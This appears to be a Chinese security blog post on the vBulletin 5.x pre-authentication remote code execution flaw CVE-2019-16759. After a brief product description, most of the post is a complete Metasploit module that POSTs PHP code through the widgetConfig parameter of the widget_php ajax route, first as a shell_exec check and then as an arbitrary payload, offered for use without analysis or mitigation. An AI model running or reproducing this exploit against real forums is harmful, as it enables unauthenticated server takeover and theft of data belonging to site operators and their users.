vBulletin远程代码执行漏洞(CVE-2019-16759)

  • A+
所属分类:颓废's Blog
摘要

vBulletin 是一款强大,灵活并可完全根据自己的需要定制的论坛程序套件。尽管是商业产品,但从市场份额和实际使用量上看,vBulletin还是当今最受欢迎的Web论坛软件包。

vBulletin 是一款强大,灵活并可完全根据自己的需要定制的论坛程序套件。尽管是商业产品,但从市场份额和实际使用量上看,vBulletin还是当今最受欢迎的Web论坛软件包。

Exploit

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework # The starting: https://www.0dayhack.com/ ##  class MetasploitModule < Msf::Exploit::Remote   Rank = ExcellentRanking    include Msf::Exploit::Remote::HttpClient    def initialize(info = {})  super(update_info(info,                    'Name'           => 'vBulletin 5.x 0day pre-quth RCE exploit',       'Description'    => %q{         vBulletin 5.x 0day pre-auth RCE exploit.         This should work on all versions from 5.0.0 till 5.5.4       },       'Platform'       => 'php',       'License'        => MSF_LICENSE,       'Author'         => [           'Reported by: anonymous',  # reported by           'Original exploit by: anonymous',  # original exploit           'Metasploit mod by: r00tpgp',  # metasploit module       ],       'Payload'        =>         {           'BadChars'    => "/x22",         },       'References'     =>         [           ['CVE', 'CVE-2019-16759'],           ['EDB', 'NA'],           ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],           ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']         ],       'Arch'           => ARCH_PHP,       'Targets'        => [           [ 'Automatic Targeting', { 'auto' => true }  ],       #    ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],       #    ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],       ],       'DisclosureDate' => 'Sep 23 2019',       'DefaultTarget'  => 0))        register_options(         [           OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])         ])    end      def check     res = send_request_cgi({       'method' => 'POST',       'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),       'encode_params' => false,       'vars_post'     =>        {         'widgetConfig'  => "echo shell_exec(/'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out/');exit;",       }      })       if res && res.body && res.body.include?('h4x0000r4l1f4')        return Exploit::CheckCode::Vulnerable      end       Exploit::CheckCode::Safe   end      def exploit       print_status("Sending payload.....")       resp = send_request_cgi({       'method' => 'POST',       'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),       'encode_params' => false,       'vars_post'     =>       {         #'widgetConfig'  => "echo " + payload.encoded + "exit;",   'widgetConfig'  => payload.encoded,       }      })       #unless resp and resp.code == 200       # fail_with(Failure::Unknown, "Exploit failed.")       #end        #print_good("Success!")       #print_line(resp.body)     end end

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: